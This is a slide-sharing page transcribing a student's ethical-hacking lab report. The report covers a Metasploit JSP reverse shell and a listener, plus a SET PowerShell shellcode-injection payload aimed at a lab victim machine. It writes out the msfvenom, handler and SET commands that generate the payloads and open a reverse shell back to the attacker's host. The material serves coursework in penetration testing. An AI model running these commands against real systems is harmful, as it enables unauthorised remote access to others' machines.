PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT

Slides:



Advertisements
Similar presentations
Client-server practices DSC340 Mike Pangburn. Agenda Overview of client-server development Editing on client (e.g., Notepad) or directly on server (e.g.,
Advertisements

Basic Network Concepts And Troubleshooting. A Simple Computer Network for File Sharing.
Offensive Security Part 1 Basics of Penetration Testing
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
METASPLOIT.
Browser Exploitation Framework (BeEF) Lab
Information Networking Security and Assurance Lab National Chung Cheng University Backdoors and Remote Access Tools INSA Laboratory.
Click to edit Master subtitle style Chapter 17: Troubleshooting Tools Instructor:
Remote Accessing Your Home Computer Using VNC and a Dynamic DNS Name.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
Raspberry Pi Training Truman College Goals of our Training Today Unbox and boot up the Raspberry Pi (RPi) Learn how to access the desktop graphical.
Connecting To A Remote Computer Via ‘Remote Desktop Web Connection’ Compatible With ‘Most Any’ Computer.
Week 2 File Systems & Unix Commands. File System Hierarchy.
A+ Guide to Software: Managing, Maintaining, and Troubleshooting, 5e
Objectives Define IP Address To be able to assign an IP address with its Subnet Mask and Default Gateway to a PC that operates using Windows 7 or Fedora.
Dr. Thomas E. Hicks Trinity University Computer Science.
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
Ethernet port  Make sure that your computer has an Ethernet connection (RJ45 port).  Power the zSeries on and make sure the “network link” LED is solid.
 The Control Panel window will pop up. Existing LAN USB-to-Ethernet adapter  Use an inexpensive USB-to-Ethernet adapter and connect it to your computer’s.
Logging into the linux machines This series of view charts show how to log into the linux machines from the Windows environment. Machine name IP address.
Today's Ninja Challenge: Make a Network Chat Program!
Networking in Linux. ♦ Introduction A computer network is defined as a number of systems that are connected to each other and exchange information across.
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
Backdoor Programs Trisha Arocena. 2 types 1.Backdoor programs as administrative application tools 2. Backdoor programs as viruses.
Unix Servers Used in This Class  Two Unix servers set up in CS department will be used for some programming projects  Machine name: eustis.eecs.ucf.edu.
Testing and Trouble Shooting Client Connection By Nanda Ganesan, Ph.D. © Nanda Ganesan, All Rights Reserved.
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
Chapter TCP/IP in the Windows Environment © N. Ganesan, Ph.D., All rights reserved.
APACHE INSTALL AWS Linux (Amazon Web Services EC2)
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.
SECURE LAB: CREATING A CISCO 3550 VLSM NETWORK
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Intro to Ethical Hacking
Metasploit Framework (MSF) Fundamentals
VMware ESX and ESXi Module 3.
Click to edit Master subtitle style
Windows 2008 Overview Lecture 1.
Bypassing Antivirus API
Troubleshooting a Network
ETHICAL HACKING WHAT EXACTLY IS ETHICAL HACKING ? By : Bijay Acharya
Troubleshooting ip Chapter 5e.
Changing the IP Address on the ALSMS Server Configuration Example
Lab #1 ,Ipconfig & ping commands
Backdoor Attacks.
Employee clicks on fake
Network Exploitation Tool
Raspberry Pi in Headless Operation
Chapter 6 – Routing.
Metasploit a one-stop hack shop
Laura Jaideny Pérez Gómez - A
Introduction to Networking
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
Metasploit assignment
Exploiting Metasploitable
Intro to Ethical Hacking
Linux Exploitation Tools
Week 5.
A Distributed DoS in Action
Examining IP Addressing
Backtrack Metasploit and SET
Web Application Penetration Testing ‘17
LAB 9 – INTRUSION DETECTION AND PREVENTION SYSTEMS
Troubleshooting ip Chapter 5e.
AbbottLink™ - IP Address Overview
Logging into the linux machines
Module 12 Network Configuration
Penetration Testing & Network Defense
Computer Networks Protocols
Presentation transcript:

PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT Mauchel Barthelemy – MIS 5212 | Spring 2017 Lab Assignment 1 Penetration Test: Metasploit | SET PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT Step 1 - Generating a reverse-connecting jsp shell to set up payload listener msfvenom -a x86 --platform windows -p java/jsp_shell_reverse_tcp LHOST=192.168.253.135 LPORT=8080 -f raw

PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT Mauchel Barthelemy – MIS 5212 | Spring 2017 Lab Assignment 1 Penetration Test: Metasploit | SET PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT Step 2 - Upload shell to the remote web server that supports jsp files use exploit/multi/handler set PAYLOAD java/jsp_shell_reverse_tcp set LHOST 192.168.1.101LHOST => 192.168.1.101 set LPORT 8080LPORT => 8080 exploit My exploit failed due to strong Internet Security protection (Antivirus) from victim’s machine. Otherwise, I would enter code lines: a. hostname b. ipconfig. Metasploit would continue with a command line saying: [*] Command shell session 1 opened (192.168.253.135:8080 -> 192.168. 253.135:3914) at Sat Feb 20:30:00 -0500 2017 Then, reveal computer system upon opening paylod file: Ethernet adapter Local Area Connection 3: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : 192.168.253.135 Subnet Mask . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1

PART 2 – PAYLOAD ATTACK: SET Mauchel Barthelemy – MIS 5212 | Spring 2017 Lab Assignment 1 Penetration Test: Metasploit | SET PART 2 – PAYLOAD ATTACK: SET Step 1 – Select attack method from menu 1 (for 1) Social-Engineering Attacks) 9 (for 9) Powershell Attacks Vector)

PART 2 – PAYLOAD ATTACK: SET Mauchel Barthelemy – MIS 5212 | Spring 2017 Lab Assignment 1 Penetration Test: Metasploit | SET PART 2 – PAYLOAD ATTACK: SET Step 2 – Create packet file to load file to victim machine 1 (for 1) Powershell Alphanumeric Shellcode Injector) ifconfig (to load IP information) 192.168.253.132 443 yes cd and Copy/past /root/.set/reports/powershell/ and past in new terminal after cd ls cp x86_powershell_injection.txt ~/Desktop/ Now Metasploit is listening for the packet coming from victim’s machine once the attempt to open the payload file

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.